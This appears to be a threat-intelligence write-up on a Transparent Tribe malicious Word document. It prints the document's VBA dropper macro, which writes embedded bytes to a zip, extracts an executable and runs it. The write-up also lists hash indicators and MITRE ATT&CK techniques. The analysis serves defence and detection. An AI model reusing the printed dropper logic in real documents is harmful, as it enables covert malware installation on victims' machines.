CyberThreatIntel/Pakistan/APT/Transparent Tribe/22-01-20/
2020-01-22 01:20:35 +01:00

4.2 KiB

Not as so transparent

Table of Contents

Malware analysis

The initial vector is a maldoc called ```"Criteria of Army Officers.doc" ```, this use a macro for extract and execute the PE file depends on the version of the operating system
Sub unMoferzip(Fname As Variant, FileNameFolder As Variant)
 Dim FSO As Object
 Dim oApp As Object
 'Extract the files into the Destination folder
 Set oApp = CreateObject("Shell.Application")
 oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H4
End Sub
Sub MoferfileLdr()
 Dim path_Mofer_file As String
 Dim file_Mofer_name  As String
 Dim zip_Mofer_file  As Variant
 Dim fldr_Mofer_name  As Variant
 file_Mofer_name = "ulhtagnias"
 fldr_Mofer_name = Environ$("ALLUSERSPROFILE") & "\DeIA-WIR\"
 If Dir(fldr_Mofer_name, vbDirectory) = "" Then
  MkDir (fldr_Mofer_name)
 End If
 zip_Mofer_file = fldr_Mofer_name & file_Mofer_name & ".zip"
 path_Mofer_file = fldr_Mofer_name & file_Mofer_name & ".exe"
 Dim ar1Mofer() As String
 Dim btsMofer() As Byte
 If InStr(Application.System.Version, "6.2") > 0 Or InStr(Application.System.Version, "6.3") > 0 Then
  ar1Mofer = Split(UserForm1.TextBox2.Text, "'")
  ar1Mofer = Split(UserForm1.TextBox1.Text, "'")
 End If
 Dim linMofer As Double
 linMofer = 0
 For Each vl In ar1Mofer
  ReDim Preserve btsMofer(linMofer)
  btsMofer(linMofer) = CByte(vl)
  linMofer = linMofer + 1
  Open zip_Mofer_file For Binary Access Write As #2
   Put #2, , btsMofer
 Close #2
 If Len(Dir(path_Mofer_file)) = 0 Then
  Call unMoferzip(zip_Mofer_file, fldr_Mofer_name)
 End If
   Shell path_Mofer_file, vbNormalNoFocus
End Sub

Threat Intelligence

Cyber kill chain

Indicators Of Compromise (IOC)

List of all the Indicators Of Compromise (IOC)
Indicator Description
Criteria of Army Officers.doc 1cb726eab6f36af73e6b0ed97223d8f063f8209d2c25bed39f010b4043b2b8a1
ulhtagnias.exe d2c46e066ff7802cecfcb7cf3bab16e63827c326b051dc61452b896a673a6e67 IP C2
The IOC can be exported in JSON

References MITRE ATT&CK Matrix

Enterprise tactics Technics used Ref URL
Discovery Query Registry
C&C Uncommonly Used Port
Defense Evasion Scripting
Execution Scripting
This can be exported as JSON format Export in JSON

Yara Rules

A list of YARA Rule is available here

Knowledge Graph

The following diagram shows the relationships of the techniques used by the groups and their corresponding malware:


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